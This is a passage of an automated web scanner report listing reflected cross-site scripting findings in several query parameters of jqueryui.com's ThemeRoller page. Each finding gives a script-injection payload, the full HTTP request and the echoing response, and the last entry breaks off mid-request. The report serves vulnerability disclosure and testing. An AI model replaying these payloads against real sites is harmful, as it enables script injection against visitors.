1.73. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7294b"><script>alert(1)</script>0b2f30c780e was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.74. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef8af"><script>alert(1)</script>bb639f52f51 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.75. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7769a"><script>alert(1)</script>1f24aa516b9 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

1.76. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a1"><script>alert(1)</script>07a06ed0f2b was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

1.77. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f6c"><script>alert(1)</script>4d606b712ae was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

1.78. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e1d"><script>alert(1)</script>b0705c51f was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 119997

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

1.79. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ba"><script>alert(1)</script>c860704192d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

1.80. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5e2"><script>alert(1)</script>5ad0d53056f was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.81. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb42"><script>alert(1)</script>d0177921a09 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

1.82. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540e"><script>alert(1)</script>2fec129ecd0 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&i